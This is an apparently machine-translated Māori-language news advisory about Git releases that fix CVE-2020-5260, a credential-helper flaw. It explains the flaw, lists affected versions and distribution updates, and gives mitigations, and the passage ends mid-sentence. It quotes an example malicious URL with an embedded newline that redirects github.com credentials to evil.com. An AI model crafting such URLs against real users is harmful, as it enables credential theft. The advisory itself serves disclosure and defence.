Whakaputaina nga putanga whakatika o te punaha whakahaere puna tohatoha Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 me 2.17.4, i roto i i whakakorea whakaraeraetanga (CVE-2020-5260) i roto i te kaihautu"tohu.kaiawhina", ka tukuna nga tohu ki te kaihautu he ka uru te kaihoko git ki tetahi putunga ma te whakamahi i tetahi URL whakahōputu motuhake kei roto he tohu raina hou. Ka taea te whakamahi i te whakaraeraetanga ki te whakarite mo nga tohu mai i tetahi atu kaihautu kia tukuna ki tetahi tūmau e whakahaerehia ana e te kaipatu.
Ina tohuhia he URL penei i te "https://evil.com?%0ahost=github.com/", ka tukuna e te kaihautu whaimana ina hono ana ki te ope evil.com nga tawhā motuhēhēnga kua tohua mo github.com. Ka puta te raruraru i te wa e mahi ana i nga mahi penei i te "git clone", tae atu ki te tukatuka URL mo nga submodules (hei tauira, "git submodule update" ka tukatuka aunoa i nga URL kua tohua i roto i te konae .gitmodules mai i te putunga). Ko te whakaraeraetanga he tino morearea i nga ahuatanga ka taraihia e te kaiwhakawhanake he putunga me te kore e kite i te URL, hei tauira, i te wa e mahi ana me nga waahanga iti, i nga punaha ranei e mahi ana i nga mahi aunoa, hei tauira, i roto i nga tuhinga hanga kete.
Hei aukati i nga whakaraeraetanga i nga putanga hou whakahuatia te tuku i tetahi tohu raina hou i roto i nga uara ka tukuna ma te kawa whakawhiti korero. Mo nga tohatoha, ka taea e koe te whai i te tukunga o nga whakahōutanga mokihi ki nga wharangi Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, kikorangi, FreeBSD.
Hei mahi hei aukati i te raru tūtohutia Kaua e whakamahi credential.helper ina uru atu ki nga putunga a te iwi, kaua hoki e whakamahi "git clone" i roto i te aratau "--recurse-submodules" me nga putunga kaore i tirohia. Hei mono i te credential.helper kaihautu, e mahi tiaki me te tiki kupuhipa mai keteroki, tiakina whariki he kōnae whai kupuhipa ranei, ka taea e koe te whakamahi i nga whakahau: